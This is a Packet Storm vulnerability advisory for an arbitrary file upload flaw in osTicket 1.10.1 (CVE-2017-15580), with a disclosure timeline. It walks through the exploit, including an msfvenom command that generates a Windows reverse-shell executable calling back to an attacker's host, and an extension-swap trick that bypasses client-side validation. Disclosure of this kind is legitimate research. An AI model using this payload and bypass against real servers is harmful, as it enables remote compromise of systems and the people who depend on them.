osTicket 1.10.1 Shell Upload

Type packetstorm
Reporter Rajwinder Singh
Modified 2017-10-25T00:00:00


                                            `Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-  
*# Exploit Title: File Upload Restrictions Bypassed*  
*# Date: 18 October, 2017*  
*# Exploit Author: Rajwinder Singh*  
*# Vendor Homepage: http://osticket.com/ <http://osticket.com/>*  
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip  
*# Version: v1.10.1*  
*# CVE : 2017-15580*  
Vulnerability Details:  
osTicket application provides a functionality to upload 'html' files with  
associated formats. However, application does not properly validate the  
uploaded fileas contents and thus accepts any type of files.  
Uploaded shell to get reverse shell of end user for the demo purpose.  
1. Created a valid '.html' file to bypass client-side validations.  
<p>test page</p>  
2. Created a reverse shell with '.exe' file extension using msfvenom.  
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR  
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe  
3. As shown in the below screenshot, intercepted the request and changed  
file extension '.html' to '.exe' and received a valid response from server  
along with uploaded malicious file.  
4. As shown in the below screenshot, successfully uploaded malicious file  
on the server.  
Ready to get reverse shell.  
*Affected Component:*  
*Parameter:* tickets.php?id=<ticket_number>#reply  
*Disclosure Timeline:*  
Vendor Confirmation: 11 October, 2017  
Mitre Notification: 17 October, 2017  
Public Disclosure: 18 October, 2017  
*Exploitation Technique:*  
*Severity Level:*  
Request Method(s): [+] POST  
Vulnerable Product: [+] osTicket - v1.10.1  
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply  
Thank you